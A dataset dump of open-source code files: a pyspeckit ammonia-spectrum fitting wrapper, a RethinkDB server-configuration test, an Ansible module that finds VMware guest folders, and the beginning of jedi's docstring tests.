repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
e-koch/pyspeckit | pyspeckit/wrappers/fitnh3.py | 1 | 16066 | """
NH3 fitter wrapper
==================
Wrapper to fit ammonia spectra. Generates a reasonable guess at the position
and velocity using a gaussian fit
Example use:
.. code:: python
import pyspeckit
sp11 = pyspeckit.Spectrum('spec.nh3_11.dat', errorcol=999)
sp22 = pyspeckit.Spectrum('spec.nh3_22.dat', errorcol=999)
sp33 = pyspeckit.Spectrum('spec.nh3_33.dat', errorcol=999)
sp11.xarr.refX = pyspeckit.spectrum.models.ammonia.freq_dict['oneone']
sp22.xarr.refX = pyspeckit.spectrum.models.ammonia.freq_dict['twotwo']
sp33.xarr.refX = pyspeckit.spectrum.models.ammonia.freq_dict['threethree']
input_dict={'oneone':sp11, 'twotwo':sp22, 'threethree':sp33}
spf = pyspeckit.wrappers.fitnh3.fitnh3tkin(input_dict)
Note that if you want to use the plotter wrapper with cubes, you need to do
something like the following, where the ``plot_special`` method of the stacked
``cubes`` object is set to the ``plotter_override`` function defined in the
fitnh3_wrapper code:
.. code:: python
cubes.plot_special = pyspeckit.wrappers.fitnh3.plotter_override
cubes.plot_special_kwargs = {'fignum':3, 'vrange':[55,135]}
cubes.plot_spectrum(160,99)
"""
from __future__ import print_function
import warnings
from astropy.extern.six.moves import xrange
from astropy.extern.six import iteritems
import pyspeckit
from .. import spectrum
from ..spectrum.classes import Spectrum, Spectra
from ..spectrum import units
from ..spectrum.models import ammonia_constants
import numpy as np
import copy
import random
from astropy import log
from astropy import units as u
# Register the optically-thin vtau ammonia model with pyspeckit's default
# fitter registry under the name 'ammonia_tau_thin' (the trailing 5 is
# passed through to Registry.add_fitter along with the model instance).
pyspeckit.spectrum.fitters.default_Registry.add_fitter('ammonia_tau_thin',
                                                       pyspeckit.spectrum.models.ammonia.ammonia_model_vtau_thin(),
                                                       5)

# LaTeX-formatted plot titles keyed by ammonia transition name; used by
# plot_nh3 below when labeling each subplot.
title_dict = {'oneone':'NH$_3(1, 1)$', 'twotwo':'NH$_3(2, 2)$',
              'threethree':'NH$_3(3, 3)$', 'fourfour':'NH$_3(4, 4)$',
              'fivefive':'NH$_3(5, 5)$', 'sixsix':'NH$_3(6, 6)$',
              'sevenseven':'NH$_3(7, 7)$', 'eighteight':'NH$_3(8, 8)$',
              }
def fitnh3tkin(input_dict, dobaseline=True, baselinekwargs={}, crop=False,
               cropunit=None, guessline='twotwo', tex=15, trot=20, column=15.0,
               fortho=0.66, tau=None, thin=False, quiet=False, doplot=True,
               fignum=1, guessfignum=2, smooth=False, scale_keyword=None,
               rebase=False, tkin=None, npeaks=1, guesses=None,
               fittype='ammonia',
               guess_error=True, plotter_wrapper_kwargs={}, **kwargs):
    # NOTE(review): the mutable default arguments ({} for baselinekwargs and
    # plotter_wrapper_kwargs) are only ever read in this function, never
    # mutated, so sharing across calls is harmless here.
    """
    Given a dictionary of filenames and lines, fit them together
    e.g. {'oneone':'G000.000+00.000_nh3_11.fits'}

    Parameters
    ----------
    input_dict : dict
        A dictionary in which the keys are the ammonia line names (e.g.,
        'oneone', 'twotwo', etc) and the values are either Spectrum objects
        or filenames of spectra
    dobaseline : bool
        Fit and subtract a baseline prior to fitting the model?
        Keyword arguments to `pyspeckit.spectrum.Spectrum.baseline` are
        specified in ``baselinekwargs``.
    baselinekwargs : dict
        The keyword arguments for the baseline
    crop : bool or tuple
        A range of values to crop the spectrum to.  The units are specified by
        ``cropunit``; the default ``None`` will use pixels.  If False, no
        cropping will be performed.
    cropunit : None or astropy unit
        The unit for the crop parameter
    guess_error : bool
        Use the guess line to estimate the error in all spectra?
    plotter_wrapper_kwargs : dict
        Keyword arguments to pass to the plotter
    fittype: 'ammonia' or 'cold_ammonia'
        The fitter model to use.  This is overridden if `tau` is specified,
        in which case one of the `ammonia_tau` models is used (see source code)

    Returns
    -------
    (spdict, spectra) : the dictionary of individual Spectrum objects and the
        stacked ``Spectra`` object holding the joint fit.
    """
    # Deprecation shim: 'tkin' is accepted only if the user did not also
    # supply a custom trot (trot still at its default of 20, or None).
    if tkin is not None:
        if trot == 20 or trot is None:
            trot = tkin
        else:
            raise ValueError("Please specify trot, not tkin")
        warnings.warn("Keyword 'tkin' is deprecated; use trot instead",
                      DeprecationWarning)

    # Accept either filenames (strings) or ready-made Spectrum objects.
    spdict = dict([(linename, Spectrum(value, scale_keyword=scale_keyword))
                   if type(value) is str else (linename, value)
                   for linename, value in iteritems(input_dict)
                   ])
    splist = spdict.values()

    # Put every spectrum on a velocity axis referenced to its own transition
    # rest frequency (required for plotting, cropping).
    for transition, sp in spdict.items():
        sp.xarr.convert_to_unit('km/s', velocity_convention='radio',
                                refX=pyspeckit.spectrum.models.ammonia.freq_dict[transition]*u.Hz,
                                quiet=True)

    # Optional preprocessing: crop, baseline-subtract, smooth.
    if crop and len(crop) == 2:
        for sp in splist:
            sp.crop(*crop, unit=cropunit)

    if dobaseline:
        for sp in splist:
            sp.baseline(**baselinekwargs)

    if smooth and type(smooth) is int:
        for sp in splist:
            sp.smooth(smooth)

    # Single-gaussian fit of the guess line to seed amplitude, velocity, and
    # width for the multi-line ammonia fit.
    spdict[guessline].specfit(fittype='gaussian', negamp=False, vheight=False,
                              guesses='moments')
    ampguess, vguess, widthguess = spdict[guessline].specfit.modelpars
    if widthguess < 0:
        raise ValueError("Width guess was < 0. This is impossible.")

    print("RMS guess (errspec): ", spdict[guessline].specfit.errspec.mean())
    print("RMS guess (residuals): ", spdict[guessline].specfit.residuals.std())
    errguess = spdict[guessline].specfit.residuals.std()

    if rebase:
        # redo baseline subtraction excluding the centroid +/- about 20 km/s
        vlow = spdict[guessline].specfit.modelpars[1]-(19.8+spdict[guessline].specfit.modelpars[2]*2.35)
        vhigh = spdict[guessline].specfit.modelpars[1]+(19.8+spdict[guessline].specfit.modelpars[2]*2.35)
        for sp in splist:
            sp.baseline(exclude=[vlow, vhigh], **baselinekwargs)

    # Propagate the residual-based error estimate to every spectrum and
    # switch the axes to GHz for the joint fit.
    for sp in splist:
        if guess_error:
            sp.error[:] = errguess
        sp.xarr.convert_to_unit(u.GHz)

    if doplot:
        spdict[guessline].plotter(figure=guessfignum)
        spdict[guessline].specfit.plot_fit()

    # Stack all lines into one Spectra object and fit them simultaneously.
    spectra = Spectra(splist)
    spectra.specfit.npeaks = npeaks

    if tau is not None:
        # tau-parameterized model; the random.random()*i jitter separates the
        # initial guesses of multiple peaks (i=0 leaves peak 1 unperturbed).
        if guesses is None:
            guesses = [a for i in xrange(npeaks) for a in
                       (trot+random.random()*i, tex, tau+random.random()*i,
                        widthguess+random.random()*i, vguess+random.random()*i,
                        fortho)]
        fittype = 'ammonia_tau_thin' if thin else 'ammonia_tau'
        spectra.specfit(fittype=fittype, quiet=quiet, guesses=guesses,
                        **kwargs)
    else:
        # column-parameterized (generic) ammonia model.
        if guesses is None:
            guesses = [a for i in xrange(npeaks) for a in
                       (trot+random.random()*i, tex, column+random.random()*i,
                        widthguess+random.random()*i, vguess+random.random()*i,
                        fortho)]
        if thin:
            raise ValueError("'thin' keyword not supported for the generic ammonia model")
        spectra.specfit(fittype=fittype, quiet=quiet, guesses=guesses,
                        **kwargs)

    if doplot:
        plot_nh3(spdict, spectra, fignum=fignum, **plotter_wrapper_kwargs)

    return spdict, spectra
def plot_nh3(spdict, spectra, fignum=1, show_components=False,
             residfignum=None, show_hyperfine_components=True, annotate=True,
             axdict=None, figure=None,
             **plotkwargs):
    """
    Plot the results from a multi-nh3 fit

    spdict needs to be dictionary with form:
        'oneone': spectrum,
        'twotwo': spectrum,
        etc.

    Parameters
    ----------
    spectra : Spectra
        The stacked object holding the joint fit whose parameters are copied
        onto each individual spectrum before plotting.
    axdict : dict or None
        Mapping of line name -> matplotlib axis; built automatically via
        make_axdict when None.
    residfignum : int or None
        If given, residuals are plotted in a separate figure of this number.
    """
    from matplotlib import pyplot

    if figure is None:
        spectra.plotter.figure = pyplot.figure(fignum)
        spectra.plotter.axis = spectra.plotter.figure.gca()

    splist = spdict.values()

    for transition, sp in spdict.items():
        # put each spectrum back on its own velocity axis
        sp.xarr.convert_to_unit('km/s', velocity_convention='radio',
                                refX=pyspeckit.spectrum.models.ammonia.freq_dict[transition]*u.Hz,
                                quiet=True)
        # copy the joint-fit fitter/parameters onto each line so each panel
        # can render the model; AttributeError means no fitter exists yet.
        try:
            sp.specfit.fitter = copy.copy(spectra.specfit.fitter)
            sp.specfit.fitter.npeaks = spectra.specfit.npeaks
        except AttributeError:
            pass
        sp.specfit.modelpars = spectra.specfit.modelpars
        sp.specfit.parinfo = spectra.specfit.parinfo
        sp.specfit.npeaks = spectra.specfit.npeaks
        if spectra.specfit.modelpars is not None:
            # re-evaluate the shared model on this spectrum's x-axis
            sp.specfit.model = sp.specfit.fitter.n_ammonia(pars=spectra.specfit.modelpars, parnames=spectra.specfit.fitter.parnames)(sp.xarr)

    if axdict is None:
        axdict = make_axdict(splist, spdict)

    for linename, sp in iteritems(spdict):
        if linename not in axdict:
            raise NotImplementedError("Plot windows for {0} cannot "
                                      "be automatically arranged (yet)."
                                      .format(linename))
        sp.plotter.axis = axdict[linename]  # permanent
        sp.plotter(axis=axdict[linename], title=title_dict[linename], **plotkwargs)
        sp.specfit.Spectrum.plotter = sp.plotter
        sp.specfit.selectregion(reset=True)
        if sp.specfit.modelpars is not None:
            sp.specfit.plot_fit(annotate=False, show_components=show_components,
                                show_hyperfine_components=show_hyperfine_components)

    # annotate only the (1,1) panel to avoid repeating the legend
    if spdict['oneone'].specfit.modelpars is not None and annotate:
        spdict['oneone'].specfit.annotate(labelspacing=0.05,
                                          prop={'size':'small',
                                                'stretch':'extra-condensed'},
                                          frameon=False)

    if residfignum is not None:
        pyplot.figure(residfignum)
        pyplot.clf()
        axdict = make_axdict(splist, spdict)
        for linename, sp in iteritems(spdict):
            sp.specfit.plotresiduals(axis=axdict[linename])
def make_axdict(splist, spdict):
    """
    Build a mapping of ammonia line name -> matplotlib axis.

    Supported panel counts: 2 (2x1 grid), 3 (one wide top panel plus two
    bottom panels), and 4 (2x2 grid).  Lines are laid out in the canonical
    order given by ammonia_constants.line_names.
    """
    from matplotlib import pyplot

    # canonical ordering, restricted to the lines actually present
    present = [name for name in ammonia_constants.line_names if name in spdict]

    n_panels = len(splist)
    axdict = {}

    if n_panels == 2:
        for position, name in enumerate(present, start=1):
            axdict[name] = pyplot.subplot(2, 1, position)
    elif n_panels == 3:
        # first line spans the full top row; the rest share the bottom row
        position = 1
        for name in present:
            if position == 1:
                axdict[name] = pyplot.subplot(2, 1, position)
                position += 2
            else:
                axdict[name] = pyplot.subplot(2, 2, position)
                position += 1
    elif n_panels == 4:
        for position, name in enumerate(present, start=1):
            axdict[name] = pyplot.subplot(2, 2, position)
    else:
        raise NotImplementedError("Plots with {0} subplots are not yet "
                                  "implemented. Pull requests are "
                                  "welcome!".format(len(splist)))

    return axdict
def fitnh3(spectrum, vrange=[-100, 100], vrangeunit='km/s', quiet=False, Tex=20,
           trot=15, column=1e15, fortho=1.0, tau=None, Tkin=None,
           fittype='ammonia',
           spec_convert_kwargs={}):
    """
    Fit an ammonia model to a single spectrum.

    Parameters
    ----------
    spectrum : Spectrum
        The spectrum to fit (modified in place and returned).
    vrange : sequence or False
        Velocity range to crop to before fitting (in ``vrangeunit``).
    tau : float or None
        If given, fit the 'ammonia_tau' model instead of ``fittype``.
    Tkin : float or None
        Deprecated alias for ``trot``.
    """
    # Deprecation shim: accept Tkin only when trot was left at its default.
    # BUG FIX: this previously compared against 20 (copied from fitnh3tkin,
    # whose trot default IS 20), but this function's default is trot=15, so
    # supplying Tkin always raised ValueError.  Compare against 15 instead.
    if Tkin is not None:
        if trot == 15 or trot is None:
            trot = Tkin
        else:
            raise ValueError("Please specify trot, not Tkin")
        warnings.warn("Keyword 'Tkin' is deprecated; use trot instead",
                      DeprecationWarning)

    if vrange:
        spectrum.xarr.convert_to_unit(vrangeunit, **spec_convert_kwargs)
        spectrum.crop(*vrange, unit=vrangeunit)

    # Seed velocity/width with a simple gaussian fit.
    spectrum.specfit(fittype='gaussian', negamp=False, guesses='moments')
    ampguess, vguess, widthguess = spectrum.specfit.modelpars

    if tau is None:
        spectrum.specfit(fittype=fittype, quiet=quiet,
                         guesses=[Tex, trot, column, widthguess, vguess,
                                  fortho])
    else:
        spectrum.specfit(fittype='ammonia_tau', quiet=quiet,
                         guesses=[Tex, trot, tau, widthguess, vguess, fortho])
    return spectrum
def BigSpectrum_to_NH3dict(sp, vrange=None):
    """
    A rather complicated way to make the spdicts above given a spectrum...

    For each known ammonia transition, check whether its (possibly
    velocity-shifted) rest frequency falls inside ``sp``'s frequency axis;
    if so, make a deep copy of ``sp`` keyed by the line name, put it on a
    velocity axis referenced to that transition, and optionally slice it to
    ``vrange`` (km/s).  Returns the resulting {linename: Spectrum} dict.
    """
    sp.xarr.convert_to_unit('GHz')

    spdict = {}
    for linename, freq in iteritems(spectrum.models.ammonia.freq_dict):
        # freq_dict values may be plain floats; normalize to Hz quantities
        if not hasattr(freq, 'unit'):
            freq = freq*u.Hz
        if vrange is not None:
            # Doppler-shift the rest frequency to both ends of the requested
            # velocity range so in-range lines near the band edge are caught.
            freq_test_low = freq - freq * vrange[0]/units.speedoflight_kms
            freq_test_high = freq - freq * vrange[1]/units.speedoflight_kms
        else:
            freq_test_low = freq_test_high = freq

        log.debug("line {2}: freq test low, high: {0}, {1}"
                  .format(freq_test_low, freq_test_high, linename))
        if (sp.xarr.as_unit('Hz').in_range(freq_test_low) or
                sp.xarr.as_unit('Hz').in_range(freq_test_high)):
            spdict[linename] = sp.copy(deep=True)
            spdict[linename].xarr.convert_to_unit('GHz')
            # sanity check: the copy's axis must match the original exactly
            assert np.all(np.array(spdict[linename].xarr == sp.xarr,
                                   dtype='bool'))
            spdict[linename].xarr.refX = freq
            spdict[linename].xarr.convert_to_unit('km/s',
                                                  velocity_convention='radio',
                                                  refX=pyspeckit.spectrum.models.ammonia.freq_dict[linename]*u.Hz,
                                                  quiet=True)
            # round-trip check: converting back to GHz must reproduce sp.xarr
            np.testing.assert_array_almost_equal(spdict[linename].xarr.as_unit('GHz').value,
                                                 sp.xarr.value)
            log.debug("Line {0}={2}: {1}".format(linename, spdict[linename],
                                                 freq))
            if vrange is not None:
                try:
                    spdict[linename] = spdict[linename].slice(start=vrange[0],
                                                              stop=vrange[1],
                                                              unit='km/s')
                    log.debug("Successfully cropped {0} to {1}, freq = {2}, {3}"
                              .format(linename, vrange, freq,
                                      spdict[linename].xarr))
                    # discard lines whose slice came out empty
                    if len(spdict[linename]) == 0:
                        spdict.pop(linename)
                        log.debug("Removed {0} from spdict".format(linename))
                except IndexError:
                    # if the freq in range, but there's no data in range, remove
                    spdict.pop(linename)
        else:
            log.debug("Line {0} not in spectrum".format(linename))

    # this shouldn't be reachable, but there are reported cases where spdict
    # gets populated w/empty spectra, which leads to a failure in producing
    # their repr.  Since that on its own isn't a very helpful error message,
    # we'd rather return the bad spdict and see if the next function down the
    # line can survive with a questionable spdict...
    try:
        log.debug(str(spdict))
    except Exception as ex:
        log.debug(str(ex))

    return spdict
def plotter_override(sp, vrange=None, **kwargs):
    """
    Do plot_nh3 with syntax similar to plotter()

    Splits ``sp`` into per-line spectra with BigSpectrum_to_NH3dict, then
    delegates to plot_nh3.  Returns the line dictionary.
    """
    spdict = BigSpectrum_to_NH3dict(sp, vrange=vrange)
    log.debug("spdict: {0}".format(spdict))
    if len(spdict) > 4:
        raise ValueError("Too many lines ({0}) found.".format(len(spdict)))
    if len(spdict) not in (2, 3, 4):
        # BUG FIX: the last two concatenated fragments previously produced a
        # doubled space ("overlaps with  it."); rebalanced the fragments.
        raise ValueError("Not enough lines; don't need to use the NH3 plot "
                         "wrapper. If you think you are getting this message "
                         "incorrectly, check the velocity range (vrange "
                         "parameter) and make sure your spectrum overlaps "
                         "with it.")
    plot_nh3(spdict, sp, **kwargs)
    return spdict
| mit |
tempbottle/rethinkdb | test/interface/server_config.py | 9 | 7581 | #!/usr/bin/env python
# Copyright 2014-2015 RethinkDB, all rights reserved.
import os, sys, time
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, 'common')))
import driver, scenario_common, utils, vcoptparse
# Parse the standard scenario command-line flags (interpreter, serve options).
op = vcoptparse.OptParser()
scenario_common.prepare_option_parser_mode_flags(op)
_, command_prefix, serve_options = scenario_common.parse_mode_flags(op.parse(sys.argv))

r = utils.import_python_driver()
dbName, tableName = utils.get_test_db_table()

utils.print_with_time("Starting cluster of 2 servers")
with driver.Cluster(output_folder='.') as cluster:
    # Server 'a': tag "foo", automatic cache sizing.
    # Server 'b': tags "foo" and "bar", explicit 123 MB cache.
    process1 = driver.Process(cluster, name='a', server_tags=["foo"], command_prefix=command_prefix, extra_options=serve_options + ["--cache-size", "auto"])
    process2 = driver.Process(cluster, name='b', server_tags=["foo", "bar"], command_prefix=command_prefix, extra_options=serve_options + ["--cache-size", "123"])
    cluster.wait_until_ready()

    utils.print_with_time("Establishing ReQL connections")
    reql_conn1 = r.connect(process1.host, process1.driver_port)
    reql_conn2 = r.connect(process2.host, process2.driver_port)

    # Both servers must appear in server_config with the expected ids.
    assert r.db("rethinkdb").table("server_config").count().run(reql_conn1) == 2
    assert process1.uuid == r.db("rethinkdb").table("server_config").filter({"name":process1.name}).nth(0)["id"].run(reql_conn1)
    assert process2.uuid == r.db("rethinkdb").table("server_config").filter({"name":"b"}).nth(0)["id"].run(reql_conn1)
def check_name(uuid, expect_name):
names = [r.db("rethinkdb").table("server_config").get(uuid)["name"].run(c) for c in [reql_conn1, reql_conn2]]
assert names[0] == names[1] == expect_name, 'The tags did not match: %s vs. %s vs. %s' % (names[0], names[1], expect_name)
    def check_tags(uuid, expect_tags):
        # Ask both servers for the row's tag set; both must agree with the
        # expected tags (order-insensitive, hence the set comparison).
        tags = [r.db("rethinkdb").table("server_config").get(uuid)["tags"].run(c) for c in [reql_conn1, reql_conn2]]
        assert set(tags[0]) == set(tags[1]) == set(expect_tags), 'The tags did not match: %s vs. %s vs. %s' % (str(tags[0]), str(tags[1]), str(expect_tags))
    # == check working with names

    utils.print_with_time("Checking initial names")
    check_name(process1.uuid, "a")
    check_name(process2.uuid, "b")
    cluster.check()

    utils.print_with_time("Checking changing name locally")
    res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"name": "a2"}).run(reql_conn1)
    assert res["errors"] == 0
    time.sleep(.2)  # give the change a moment to propagate to the other server
    check_name(process1.uuid, "a2")
    check_name(process2.uuid, "b")
    cluster.check()

    utils.print_with_time("Checking changing name remotely")
    res = r.db("rethinkdb").table("server_config").get(process2.uuid).update({"name": "b2"}).run(reql_conn1)
    assert res["errors"] == 0
    time.sleep(.2)
    check_name(process1.uuid, "a2")
    check_name(process2.uuid, "b2")
    cluster.check()

    utils.print_with_time("Checking that name conflicts are rejected")
    res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"name": "b2"}).run(reql_conn1)
    assert res["errors"] == 1
    assert "already exists" in res["first_error"]
    time.sleep(.2)
    check_name(process1.uuid, "a2")
    check_name(process2.uuid, "b2")
    cluster.check()

    # == check working with tags

    utils.print_with_time("Checking initial tags")
    # every server implicitly carries the "default" tag
    check_tags(process1.uuid, ["default", "foo"])
    check_tags(process2.uuid, ["default", "foo", "bar"])
    cluster.check()

    utils.print_with_time("Checking changing tags locally")
    res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"tags": ["baz"]}).run(reql_conn1)
    assert res["errors"] == 0
    time.sleep(.2)
    check_tags(process1.uuid, ["baz"])
    check_tags(process2.uuid, ["default", "foo", "bar"])
    cluster.check()

    utils.print_with_time("Checking changing tags remotely")
    res = r.db("rethinkdb").table("server_config").get(process2.uuid).update({"tags": ["quz"]}).run(reql_conn1)
    assert res["errors"] == 0
    time.sleep(.2)
    check_tags(process1.uuid, ["baz"])
    check_tags(process2.uuid, ["quz"])
    cluster.check()

    utils.print_with_time("Checking that invalid tags are rejected")
    res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"tags": [":-)"]}).run(reql_conn1)
    assert res["errors"] == 1, "It shouldn't be possible to set tags that aren't valid names."
    time.sleep(.2)
    check_tags(process1.uuid, ["baz"])
    check_tags(process2.uuid, ["quz"])
    cluster.check()

    # == check working with cache size

    utils.print_with_time("Checking initial cache size")
    res = r.db("rethinkdb").table("server_config").get(process1.uuid)["cache_size_mb"].run(reql_conn1)
    assert res == "auto", res
    res = r.db("rethinkdb").table("server_config") \
        .get(process2.uuid)["cache_size_mb"].run(reql_conn1)
    assert res == 123, res
    # server_status should reflect the same effective cache size
    res = r.db("rethinkdb").table("server_status") \
        .get(process2.uuid)["process"]["cache_size_mb"].run(reql_conn1)
    assert res == 123, res

    utils.print_with_time("Checking that cache size can be changed...")
    res = r.db("rethinkdb").table("server_config") \
        .get(process2.uuid).update({"cache_size_mb": 234}) \
        .run(reql_conn1)
    assert res["errors"] == 0, res
    res = r.db("rethinkdb").table("server_config") \
        .get(process2.uuid)["cache_size_mb"].run(reql_conn1)
    assert res == 234, res
    res = r.db("rethinkdb").table("server_status") \
        .get(process2.uuid)["process"]["cache_size_mb"].run(reql_conn1)
    assert res == 234, res

    utils.print_with_time("Checking that absurd cache sizes are rejected...")
    def try_bad_cache_size(size, message):
        # Attempt to set an invalid cache size and verify the expected
        # error message is produced.
        res = r.db("rethinkdb").table("server_config") \
            .get(process2.uuid).update({"cache_size_mb": r.literal(size)}) \
            .run(reql_conn1)
        assert res["errors"] == 1, res
        assert message in res["first_error"]
    try_bad_cache_size("foobar", "wrong format")
    try_bad_cache_size(-30, "wrong format")
    try_bad_cache_size({}, "wrong format")
    # 2**40 is chosen so that it fits into a 64-bit integer when expressed in bytes, to
    # test the code path where the value is sent to the other server but then rejected by
    # validate_total_cache_size().
    try_bad_cache_size(2**40, "Error when trying to change the configuration")
    # 2**100 is chosen so that it doesn't fit into a 64-bit integer, so it will take a
    # different code path and get a different error message.
    try_bad_cache_size(2**100, "wrong format")

    utils.print_with_time("Checking that nonsense is rejected...")
    # inserting rows and malformed updates must all be refused
    res = r.db("rethinkdb").table("server_config") \
        .insert({"name": "hi", "tags": [], "cache_size": 100}).run(reql_conn1)
    assert res["errors"] == 1, res
    res = r.db("rethinkdb").table("server_config").update({"foo": "bar"}).run(reql_conn1)
    assert res["errors"] == 2, res
    res = r.db("rethinkdb").table("server_config").update({"name": 2}).run(reql_conn1)
    assert res["errors"] == 2, res
    res = r.db("rethinkdb").table("server_config").replace(r.row.without("name")) \
        .run(reql_conn1)
    assert res["errors"] == 2, res
    res = r.db("rethinkdb").table("server_config") \
        .update({"cache_size": "big!"}).run(reql_conn1)
    assert res["errors"] == 2, res
    res = r.db("rethinkdb").table("server_config").update({"tags": 0}).run(reql_conn1)
    assert res["errors"] == 2, res

    cluster.check_and_stop()
utils.print_with_time("Cleaning up")
utils.print_with_time("Done")
| agpl-3.0 |
Dhivyap/ansible | lib/ansible/modules/cloud/vmware/vmware_guest_find.py | 18 | 4775 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vmware_guest_find
short_description: Find the folder path(s) for a virtual machine by name or UUID
description:
- Find the folder path(s) for a virtual machine by name or UUID
version_added: 2.4
author:
- Abhijeet Kasurde (@Akasurde) <akasurde@redhat.com>
notes:
- Tested on vSphere 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
name:
description:
- Name of the VM to work with.
- This is required if C(uuid) parameter is not supplied.
type: str
uuid:
description:
- UUID of the instance to manage if known, this is VMware's BIOS UUID by default.
- This is required if C(name) parameter is not supplied.
type: str
use_instance_uuid:
description:
- Whether to use the VMware instance UUID rather than the BIOS UUID.
default: no
type: bool
version_added: '2.8'
datacenter:
description:
- Destination datacenter for the find operation.
- Deprecated in 2.5, will be removed in 2.9 release.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Find Guest's Folder using name
vmware_guest_find:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
validate_certs: no
name: testvm
delegate_to: localhost
register: vm_folder
- name: Find Guest's Folder using UUID
vmware_guest_find:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
uuid: 38c4c89c-b3d7-4ae6-ae4e-43c5118eae49
delegate_to: localhost
register: vm_folder
'''
RETURN = r"""
folders:
description: List of folders for user specified virtual machine
returned: on success
type: list
sample: [
'/DC0/vm',
]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
from ansible.module_utils.vmware import PyVmomi, vmware_argument_spec, find_vm_by_id
try:
from pyVmomi import vim
except ImportError:
pass
class PyVmomiHelper(PyVmomi):
    """Helper around the shared PyVmomi base class that locates the folder
    path(s) of a virtual machine identified by name or UUID."""

    def __init__(self, module):
        super(PyVmomiHelper, self).__init__(module)
        # Cache the module parameters this helper needs.
        self.name = self.params['name']
        self.uuid = self.params['uuid']
        self.use_instance_uuid = self.params['use_instance_uuid']

    def getvm_folder_paths(self):
        """Return a list of folder paths, one per matching VM.

        UUID lookup yields at most one VM (and fails the module if none is
        found); name lookup can match several VMs with the same name.
        """
        results = []
        vms = []

        if self.uuid:
            # UUID lookup: instance UUID or BIOS UUID depending on the flag.
            if self.use_instance_uuid:
                vm_obj = find_vm_by_id(self.content, vm_id=self.uuid, vm_id_type="instance_uuid")
            else:
                vm_obj = find_vm_by_id(self.content, vm_id=self.uuid, vm_id_type="uuid")
            if vm_obj is None:
                self.module.fail_json(msg="Failed to find the virtual machine with UUID : %s" % self.uuid)
            vms = [vm_obj]

        elif self.name:
            # Name lookup: collect every VM whose name matches exactly.
            objects = self.get_managed_objects_properties(vim_type=vim.VirtualMachine, properties=['name'])
            for temp_vm_object in objects:
                if temp_vm_object.obj.name == self.name:
                    vms.append(temp_vm_object.obj)

        for vm in vms:
            folder_path = self.get_vm_path(self.content, vm)
            results.append(folder_path)

        return results
def main():
    """Module entry point: parse arguments, find the VM, report folder paths."""
    argument_spec = vmware_argument_spec()
    argument_spec.update(
        name=dict(type='str'),
        uuid=dict(type='str'),
        use_instance_uuid=dict(type='bool', default=False),
        # deprecated parameter, scheduled for removal in 2.9
        datacenter=dict(removed_in_version=2.9, type='str')
    )

    # Exactly one of name/uuid must be supplied.
    module = AnsibleModule(argument_spec=argument_spec,
                           required_one_of=[['name', 'uuid']],
                           mutually_exclusive=[['name', 'uuid']],
                           )

    pyv = PyVmomiHelper(module)
    # Check if the VM exists before continuing
    folders = pyv.getvm_folder_paths()

    # VM already exists
    if folders:
        try:
            module.exit_json(folders=folders)
        except Exception as exc:
            module.fail_json(msg="Folder enumeration failed with exception %s" % to_native(exc))
    else:
        module.fail_json(msg="Unable to find folders for virtual machine %s" % (module.params.get('name') or
                                                                                module.params.get('uuid')))
if __name__ == '__main__':
main()
| gpl-3.0 |
dCache/dcache-docker | dcache/deps/.vim/bundle/jedi-vim/jedi/test/test_evaluate/test_docstring.py | 16 | 4392 | """
Testing of docstring related issues and especially ``jedi.docstrings``.
"""
from textwrap import dedent
import jedi
from ..helpers import unittest
# numpydoc is an optional dependency: probe for it so the numpydoc-specific
# tests below can be skipped when it is not installed.
try:
    import numpydoc
except ImportError:
    numpydoc_unavailable = True
else:
    numpydoc_unavailable = False
class TestDocstring(unittest.TestCase):
    """Tests for jedi's docstring handling: raw_doc retrieval and type
    inference from reST/numpydoc parameter annotations."""

    def test_function_doc(self):
        # goto_definitions on a function name exposes its docstring.
        defs = jedi.Script("""
def func():
    '''Docstring of `func`.'''
func""").goto_definitions()
        self.assertEqual(defs[0].raw_doc, 'Docstring of `func`.')

    @unittest.skip('need evaluator class for that')
    def test_attribute_docstring(self):
        # "attribute docstrings" (a string statement after an assignment)
        defs = jedi.Script("""
x = None
'''Docstring of `x`.'''
x""").goto_definitions()
        self.assertEqual(defs[0].raw_doc, 'Docstring of `x`.')

    @unittest.skip('need evaluator class for that')
    def test_multiple_docstrings(self):
        # A name bound to a documented function keeps both docstrings.
        defs = jedi.Script("""
def func():
    '''Original docstring.'''
x = func
'''Docstring of `x`.'''
x""").goto_definitions()
        docs = [d.raw_doc for d in defs]
        self.assertEqual(docs, ['Original docstring.', 'Docstring of `x`.'])

    def test_completion(self):
        # Completion inside a docstring should not crash.
        assert jedi.Script('''
class DocstringCompletion():
    #? []
    """ asdfas """''').completions()

    def test_docstrings_type_dotted_import(self):
        # ":type arg: random.Random" should resolve through the dotted path.
        s = """
def func(arg):
    '''
    :type arg: random.Random
    '''
    arg."""
        names = [c.name for c in jedi.Script(s).completions()]
        assert 'seed' in names

    def test_docstrings_param_type(self):
        # ":param str arg:" declares the parameter type inline.
        s = """
def func(arg):
    '''
    :param str arg: some description
    '''
    arg."""
        names = [c.name for c in jedi.Script(s).completions()]
        assert 'join' in names

    def test_docstrings_type_str(self):
        s = """
def func(arg):
    '''
    :type arg: str
    '''
    arg."""
        names = [c.name for c in jedi.Script(s).completions()]
        assert 'join' in names

    def test_docstring_instance(self):
        # The types hint that it's a certain kind
        s = dedent("""
class A:
    def __init__(self,a):
        '''
        :type a: threading.Thread
        '''
        if a is not None:
            a.start()

        self.a = a

def method_b(c):
    '''
    :type c: A
    '''
    c.""")
